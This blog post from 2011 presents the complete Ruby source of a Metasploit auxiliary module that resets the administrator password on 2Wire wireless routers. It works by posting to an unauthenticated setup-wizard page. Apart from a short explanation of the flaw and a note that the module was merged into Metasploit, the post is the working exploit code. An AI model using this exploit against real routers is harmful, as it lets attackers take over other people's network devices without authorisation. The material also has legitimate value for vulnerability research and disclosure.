Wednesday, June 22, 2011

Metasploit module to reset admin password on 2wire wireless routers.

UPDATE: This module is now a part of metasploit. just run msfupdate and it should be under auxiliary/admin/2wire/xslt_password_reset. For details, see here

Here is a metaploit module I coded to reset the password on a 2wire router. It uses a setup wizard page that doesn't verify if the user is authenticated nor remove itself after first time setup. This can be exploited to reset the password. Without further delay, here is the code.

on my ubuntu box I placed this under /opt/metasploit3/msf3/modules/auxiliary/admin/2wire/2wirepasswordreset.rb

=====================================================
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize
super(
'Name' => '2Wire Password Reset',
'Version' => '$Revision: 1 $',
'Description' => %Q{
This module will reset the admin password on a 2wire wireless router. This works by using a setup wizard
page that fails to check if a user is authenicated and doesn't remove or block after first access.
},
'Author' => 'Travis Phillips',
'License' => MSF_LICENSE
)
register_options(
[
Opt::RPORT(80),
OptString.new('PASSWORD', [ true, 'What you want the password reset to', 'admin'])
], self.class)

end

def run
begin
print_status("Attempting to rest password to #{datastore['PASSWORD']} on #{rhost}\n")
res = send_request_cgi(
{
'method' => 'POST',
'uri' => '/xslt',
'data' => 'PAGE=H04_POST&THISPAGE=H04&NEXTPAGE=A01&PASSWORD=' + datastore['PASSWORD'] + '&PASSWORD_CONF=' + datastore['PASSWORD'] + '&HINT=',
}, 25)
if (res.code == 200)
if (res.headers['Set-Cookie'])
print_status("Password reset successful!\n")
end
end
end
end
end
=====================================================